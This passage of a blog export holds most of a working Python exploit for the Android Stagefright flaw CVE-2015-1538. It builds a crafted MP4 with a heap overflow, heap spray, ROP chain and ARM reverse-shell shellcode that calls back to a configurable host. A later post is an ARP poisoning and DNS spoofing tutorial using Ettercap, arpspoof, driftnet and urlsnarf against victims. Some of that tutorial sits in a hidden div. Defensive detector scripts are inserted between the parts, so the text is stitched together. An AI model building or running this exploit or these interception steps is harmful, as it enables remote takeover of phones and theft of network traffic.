    ret += struct.pack('>L', 0) # mNumSampleSizes
    return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
    ret = struct.pack('>L', 0) # version
    ret += struct.pack('>L', 0) # mTimeToSampleCount
    return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
    ret = ''
    ret += struct.pack('>L', start + 1)
    ret += struct.pack('>L', per)
    ret += struct.pack('>L', desc)
    return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
    ret = struct.pack('>L', 0) # version/flags
    # this is the clean version...
    if not do_overflow:
        ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
        ret += 'Z' * (12 * num_alloc)
        return make_chunk('stsc', ret)
    # now the explicit version. (trigger the bug)
    ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
    # fill in the entries that will overflow the buffer
    for x in range(0, num_write):
        ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
    ret = make_chunk('stsc', ret)
    # patch the data_size
    ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
    return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
    rop = ''
    rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
    rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
    rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
    rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
    rop += struct.pack('<L', 0x1000) # new r1 - length
    rop += struct.pack('<L', 7) # new r2 - protection
    rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
    rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
    rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
    native_start = sp_addr + 0x80
    rop += struct.pack('<L', native_start) # address of native payload
    #rop += struct.pack('<L', 0xfeedfed5) # top of stack...
    # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
    buf = ''
    # fork
    buf += '\x02\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # continue if not parent...
    buf += '\x00\x00\x50\xe3'
    buf += '\x02\x00\x00\x0a'
    # exit parent
    buf += '\x00\x00\xa0\xe3'
    buf += '\x01\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # setsid in child
    buf += '\x42\x70\xa0\xe3'
    buf += '\x00\x00\x00\xef'
    # socket/connect/dup2/dup2/dup2
    buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
    buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
    buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
    buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
    buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
    buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
    buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
    buf += '\xe3\x00\x00\x00\xef'
    # execve(shell, argv, env)
    buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
    buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
    buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
    buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
    buf += '\xef\x02\x00'
    # Add the connect back host/port
    buf += struct.pack('!H', cb_port)
    cb_host = socket.inet_aton(cb_host)
    buf += struct.pack('=4s', cb_host)
    # shell -
    buf += '/system/bin/sh\x00\x00'
    # argv -
    buf += 'sh\x00\x00'
    # env -
    buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
    # Add some identifiable stuff, just in case something goes awry...
    rop_start_off = 0x34
    x = rop_start_off + len(rop)
    while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data) </pre>
<pre> </pre>
<pre><b>Use at your own risk, and do not test devices that you are not authorized to test.</b></pre>
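A defender-side check for the field that make_stsc() above manipulates, as an added example that is not part of the original exploit code: it walks an MP4's boxes and flags any 'stsc' box whose entry count needs more bytes than the box holds, and reports whether a size computation done in 32-bit arithmetic would wrap and accept it. The container list, function names and both sample files are assumptions constructed for this illustration.<br />

```python
import struct

# Boxes that only contain other boxes on the path moov/trak/mdia/minf/stbl.
CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
STSC_ENTRY_SIZE = 12  # first chunk, samples per chunk, sample description index


def iter_boxes(buf, start, end):
    """Yield (type, payload_start, payload_end) for each box in buf[start:end]."""
    pos = start
    while pos + 8 <= end:
        size, btype = struct.unpack_from(">L4s", buf, pos)
        if size < 8 or pos + size > end:
            return  # 64-bit/zero sizes and truncated boxes end the walk here
        yield btype, pos + 8, pos + size
        pos += size


def check_stsc(buf, payload_start, payload_end):
    """Return a finding dict if the entry count cannot fit, else None."""
    available = payload_end - payload_start
    if available < 8:
        return {"offset": payload_start - 8, "reason": "stsc header truncated"}
    _version_flags, count = struct.unpack_from(">LL", buf, payload_start)
    needed = 8 + count * STSC_ENTRY_SIZE  # exact, Python ints do not wrap
    if needed <= available:
        return None
    return {
        "offset": payload_start - 8,
        "reason": "entry count exceeds box size",
        "count": count,
        "needed": needed,
        "available": available,
        # True when a parser doing this arithmetic in 32 bits would accept it.
        "passes_32bit_check": (needed & 0xFFFFFFFF) <= available,
    }


def scan_stsc(buf, start=0, end=None):
    """Recursively scan a buffer and return findings for every bad stsc box."""
    end = len(buf) if end is None else end
    findings = []
    for btype, ps, pe in iter_boxes(buf, start, end):
        if btype in CONTAINERS:
            findings.extend(scan_stsc(buf, ps, pe))
        elif btype == b"stsc":
            finding = check_stsc(buf, ps, pe)
            if finding:
                findings.append(finding)
    return findings


def box(btype, payload):
    return struct.pack(">L4s", 8 + len(payload), btype) + payload


def sample_file(count, entries):
    """Constructed test input: one track whose stsc declares `count` entries
    but physically carries `entries` zeroed entries."""
    stsc = box(b"stsc", struct.pack(">LL", 0, count) + b"\x00" * (12 * entries))
    nested = box(b"trak", box(b"mdia", box(b"minf", box(b"stbl", stsc))))
    ftyp = box(b"ftyp", b"mp42" + struct.pack(">L", 0) + b"mp42isom")
    return ftyp + box(b"moov", nested)


if __name__ == "__main__":
    print(scan_stsc(sample_file(3, 3)))            # consistent box
    print(scan_stsc(sample_file(0xC0000003, 3)))   # count as in make_stsc(3, ...)
```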
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-52390252983301815902015-09-14T11:14:00.001+05:302015-09-14T11:14:39.777+05:30Arp Poisoning using Kali<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends and readers,<br />
<br />
Today I am going to share a tutorial on the ARP poisoning attack.<br />
<br />
What we can achieve using it:<br />
<br />
a) We can spoof the network and capture the entire network traffic.<br />
<br />
There are a dozen ways to achieve this, for those who are puzzled about how to capture network traffic.<br />
<br />
<h3>
Launching an ARP Poisoning Attack</h3>
Why we need ARP, and the concept behind ARP cache poisoning, are explained in <a href="http://www.thegeekstuff.com/2012/01/arp-cache-poisoning/">ARP-Cache-Poisoning</a>. Please have a look at it; this article covers how to perform the attack in practice.<br />
The following diagram explains the network architecture. All the
attacks explained here will be performed on the following network
diagram only. Using Ettercap in a production environment is not
advisable.<br />
<img alt="" class="aligncenter size-full wp-image-10713" height="412" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap-arch.png" title="ettercap architecture" width="524" /><br />
Launch Ettercap using the following command on the 122 machine.<br />
<pre># ettercap -G</pre>
Click “Sniff->Unified Sniffing”. It will list the available
network interfaces as shown below. Choose the one you want to use
for ARP poisoning.<br />
<img alt="" class="aligncenter size-full wp-image-10701" height="102" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap2.png" title="ettercap choose interface" width="300" /><br />
Once you have chosen the interface the following window will open:<br />
<img alt="" class="aligncenter size-full wp-image-10702" height="358" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap3.png" title="ettercap launch" width="475" /><br />
The next step is to add the target list for the ARP
poisoning. Here we will add 192.168.1.51 and 192.168.1.10 as the targets,
as follows.<br />
Click “Hosts->Scan for Host”.<br />
It will start to scan the hosts present in the network.<br />
Once it is completed, click “Hosts->Host List”. It will list the available hosts in the LAN as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10704" height="456" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap4.png" title="ettercap add to target" width="375" /><br />
Now, from the list, select “192.168.1.51” and click “Add to Target 1”, then select “192.168.1.10” and click “Add to Target 2”.<br />
Now select “Mitm->Arp Poisoning” as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10705" height="201" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap5.png" title="ettercap arp poisoning" width="579" /><br />
The following dialog box will open. Select “Sniff Remote Connection” and click “ok”:<br />
<img alt="" class="aligncenter size-full wp-image-10706" height="172" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap6.png" title="ettercap sniff remote connection" width="300" /><br />
Then click “Start->Start Sniffing” as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10707" height="313" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap7.png" title="ettercap start sniffing" width="597" /><br />
Now ARP is poisoned, i.e., the 122 machine starts to send ARP packets
saying “I’m 1.10”. In order to verify it, run “ping 192.168.1.10” from
192.168.1.51. Open the “Wireshark” application on the 192.168.1.122 machine
and put a filter for ICMP. You will see the ICMP packets from
192.168.1.51 to 192.168.1.10 on 192.168.1.122 as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10708" height="182" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap-wireshark.png" title="ettercap wireshark" width="505" /><br />
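How the poisoning described above looks to a monitoring host, as an added example that is not part of the original tutorial: a passive checker that parses ARP frames, remembers the first MAC seen for each IP, and reports when 192.168.1.10 is suddenly claimed by another MAC or when one MAC claims several IPs. The MAC addresses and all frames are constructed sample data, and the class and function names are assumptions.<br />

```python
import socket
import struct

ETHERTYPE_ARP = 0x0806


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp(frame):
    """Return (sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42:
        return None
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, _oper = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return fmt_mac(frame[22:28]), socket.inet_ntoa(frame[28:32])


class ArpMonitor:
    """Keeps first-seen IP-to-MAC bindings and reports contradictions."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        mac, ip = parsed
        alerts = []
        # The first binding stays the baseline, so repeated spoofed
        # replies keep alerting instead of overwriting it.
        baseline = self.ip_to_mac.setdefault(ip, mac)
        if baseline != mac:
            alerts.append(("binding-changed", ip, baseline, mac))
        ips = self.mac_to_ips.setdefault(mac, set())
        ips.add(ip)
        if len(ips) > 1:
            alerts.append(("mac-claims-multiple-ips", mac, tuple(sorted(ips))))
        return alerts


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build the bytes of an ARP reply frame (test input only, never sent)."""
    smac = bytes.fromhex(sender_mac.replace(":", ""))
    tmac = bytes.fromhex(target_mac.replace(":", ""))
    eth = tmac + smac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
    arp += smac + socket.inet_aton(sender_ip) + tmac + socket.inet_aton(target_ip)
    return eth + arp


# Constructed MAC addresses for the three hosts in the tutorial's diagram.
MAC_10 = "02:00:00:00:00:10"
MAC_51 = "02:00:00:00:00:51"
MAC_122 = "02:00:00:00:01:22"

SAMPLE_FRAMES = [
    arp_reply(MAC_10, "192.168.1.10", MAC_51, "192.168.1.51"),    # genuine
    arp_reply(MAC_51, "192.168.1.51", MAC_10, "192.168.1.10"),    # genuine
    arp_reply(MAC_122, "192.168.1.122", MAC_51, "192.168.1.51"),  # genuine
    arp_reply(MAC_122, "192.168.1.10", MAC_51, "192.168.1.51"),   # "I'm 1.10"
    arp_reply(MAC_122, "192.168.1.51", MAC_10, "192.168.1.10"),   # "I'm 1.51"
]


def run_sample():
    monitor = ArpMonitor()
    alerts = []
    for frame in SAMPLE_FRAMES:
        alerts.extend(monitor.observe(frame))
    return alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```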
<h3>
Launching DNS Spoofing Attack in LAN</h3>
The concept of DNS is as follows.<br />
<ul>
<li>Machine A said ‘ping google.com’</li>
<li>Now it has to find that IP address of google.com</li>
<li>So it queries the DNS server with regard to the IP address for the domain google.com</li>
<li>The DNS server will have its own hierarchy, and it will find the IP address of google.com and return it to Machine A</li>
</ul>
Here we will see how we can spoof the DNS.<br />
There are many plugins which come by default with Ettercap. One
such plugin is called DNSSpoof. We are going to use that plugin to
test the DNS spoofing.<br />
Open /usr/share/ettercap/etter.dns on the 122 machine and add the following:<br />
<pre>*.google.co.in A 192.168.1.12
*.google.com A 192.168.1.12
google.com A 192.168.1.12
www.google.com PTR 192.168.1.12
www.google.co.in PTR 192.168.1.12</pre>
Here, 192.168.1.10 acts as the DNS server. In order to perform DNS
spoofing, we first need to do the ARP poisoning as explained above. Once
the ARP poisoning is done, follow the steps below.<br />
Click “Plugins->Manage Plugins” as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10709" height="176" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap8.png" title="ettercap manage plugins" width="599" /><br />
Select the “dns_spoof” plugin and double click to activate it as follows:<br />
<img alt="" class="aligncenter size-full wp-image-10710" height="464" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap9.png" title="ettercap dns spoof plugin" width="600" /><br />
Now, from 192.168.1.51, ping google.com:<br />
<pre>$ ping google.com
PING google.com (192.168.1.12) 56(84) bytes of data.
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=1 ttl=64 time=3.56 ms
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=2 ttl=64 time=0.843 ms
64 bytes from www.google.co.in (192.168.1.12): icmp_seq=3 ttl=64 time=0.646 ms</pre>
You can see that it returns a local machine’s IP address which we have given in the configuration.<br />
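The symptom shown in the ping output, checked automatically, as an added example that is not part of the original tutorial: it parses a DNS response and flags A records where a name outside the local zones resolves to a private, loopback or link-local address, as google.com does here with 192.168.1.12. The internal suffix list, the function names and the three response messages are assumptions constructed for this illustration.<br />

```python
import ipaddress
import struct

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
# Assumption: zones that are expected to resolve to internal addresses.
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")


def read_name(msg, off):
    """Decode a DNS name with compression pointers; return (name, next_offset)."""
    labels, jumps, resume = [], 0, None
    while True:
        if off >= len(msg):
            raise ValueError("truncated name")
        n = msg[off]
        if (n & 0xC0) == 0xC0:              # compression pointer
            if off + 1 >= len(msg):
                raise ValueError("truncated pointer")
            if resume is None:
                resume = off + 2
            off = ((n & 0x3F) << 8) | msg[off + 1]
            jumps += 1
            if jumps > 16:
                raise ValueError("compression loop")
            continue
        if n > 63 or off + 1 + n > len(msg):
            raise ValueError("bad label")
        off += 1
        if n == 0:
            break
        labels.append(msg[off:off + n].decode("ascii", "replace"))
        off += n
    return ".".join(labels), (resume if resume is not None else off)


def a_records(msg):
    """Return [(owner_name, IPv4Address)] from the answer section."""
    if len(msg) < 12:
        raise ValueError("truncated header")
    _id, _flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", msg, 0)
    off = 12
    for _ in range(qd):
        _, off = read_name(msg, off)
        off += 4                            # QTYPE + QCLASS
    records = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from("!HHLH", msg, off)
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4 and off + 4 <= len(msg):
            records.append((name, ipaddress.ip_address(msg[off:off + 4])))
        off += rdlen
    return records


def suspicious_answers(msg):
    """Names outside the internal zones that resolve to internal addresses."""
    hits = []
    for name, ip in a_records(msg):
        if name.lower().endswith(INTERNAL_SUFFIXES):
            continue
        if any(ip in net for net in INTERNAL_NETS):
            hits.append((name, str(ip)))
    return hits


def build_response(name, ip):
    """Constructed test input: a one-question, one-answer A response."""
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    question = qname + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHLH", 1, 1, 60, 4)
    return header + question + answer + ipaddress.ip_address(ip).packed


if __name__ == "__main__":
    print(suspicious_answers(build_response("google.com", "192.168.1.12")))
    print(suspicious_answers(build_response("google.com", "203.0.113.10")))
    print(suspicious_answers(build_response("printer.lan", "192.168.1.30")))
```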
Hope this article provides some insight into ARP poisoning and DNS
spoofing. Once everything is done, remember to stop the MITM attack as
follows:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="" border="0" class="aligncenter size-full wp-image-10711" height="188" src="http://static.thegeekstuff.com/wp-content/uploads/2012/06/ettercap11.png" title="ettercap stop mitm attack" width="598" /></a></div>
<br />
Stop the MITM attack as shown above and ensure that it is safe.<br />
<br />
<br />
You can also spoof ARP and sniff the network traffic. It can be done as follows:<br />
<div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;">
1. Open your terminal (CTRL + ALT + T <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-create-keyboard-shortcuts-on-kali-linux/" target="_blank" title="How to create keyboard shortcut on Kali Linux">kali shortcut</a>) and configure the <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> machine to allow packet forwarding, because to act as the man in the middle, <a href="http://www.hacking-tutorial.com/tag/kali-linux/">Kali Linux</a> must act as a router between the "real router" and the victim. Read the tutorial here: <a href="http://www.hacking-tutorial.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/" target="_blank">how to set up packet forwarding in linux</a>.<br />
2. You can change your terminal interface to make the view much more friendly and easy to monitor by <a href="http://www.hacking-tutorial.com/tips-and-trick/split-kali-linux-terminal-window/" target="_blank">splitting kali linux terminal window</a>.<br />
3. The next step is setting up arpspoof between victim and router.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 -t 192.168.8.90 192.168.8.8</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6261" height="130" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm2.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="665" /><br />
4. Then set up arpspoof in the other direction, to capture all packets from the router to the victim.<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">arpspoof -i eth0 -t 192.168.8.8 192.168.8.90</span></span></blockquote>
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6262" height="128" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm3.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="667" /><br />
5. After steps three and four, all packets sent or received by the victim should be going through the attacker machine.<br />
6. Now we can use driftnet to monitor all of the victim's image traffic. According to its <a href="http://www.ex-parrot.com/%7Echris/driftnet/" target="_blank">website</a>,<br />
<blockquote>
Driftnet is a program which listens to network traffic and picks out
images from TCP streams it observes. Fun to run on a host which sees
lots of web traffic.</blockquote>
7. To run driftnet, run this:<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">driftnet -i eth0</span></span></blockquote>
When the victim browses a website with images, driftnet will capture all image traffic as shown in the screenshot below.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6263" height="400" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm4.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="351" /><br />
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.<br />
8. For the next step we will capture the website information/data using urlsnarf. To use urlsnarf, run this command:<br />
<blockquote>
<span style="color: red;"><span style="font-family: courier new,courier,monospace;">urlsnarf -i eth0</span></span></blockquote>
and urlsnarf will start capturing all website addresses visited by the victim machine.<br />
9. When the victim browses a website, the attacker will know the address the victim visited.<br />
<img alt="Kali Linux Man in the Middle Attack" class="alignnone size-full wp-image-6264" height="251" src="http://d289vtzrietndv.cloudfront.net/wp-content/uploads/2013/10/kali-mitm5.jpg" style="opacity: 1;" title="Kali Linux Man in the Middle Attack" width="677" /><br />
<br />
